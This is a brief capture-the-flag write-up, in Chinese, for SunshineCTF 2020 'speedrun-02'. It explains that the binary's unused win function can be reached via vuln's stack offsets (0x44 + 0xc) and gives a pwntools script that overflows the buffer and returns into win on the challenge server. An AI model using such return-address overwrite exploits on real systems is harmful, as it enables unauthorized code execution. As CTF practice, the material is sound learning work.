###### tags: `sunshine` # speedrun-02 - ![](https://i.imgur.com/SzZDDnI.png) - ![](https://i.imgur.com/Nj0PWsY.png) - 程式有main,vuln,win,main中根本不會call到win,要在main跟vuln當中找return跳上去(這題main中的fget不會執行) - 分析vuln中有sub 0x44跟0xc ```python= from pwn import * elf = ELF("./chall_02", checksec=False) payload = 'A' * (0x44 + 0xc) payload += p32(elf.symbols["win"]) p = remote('chal.2020.sunshinectf.org', 30002) #p = process("./chall_02") p.sendline(payload) p.interactive() ```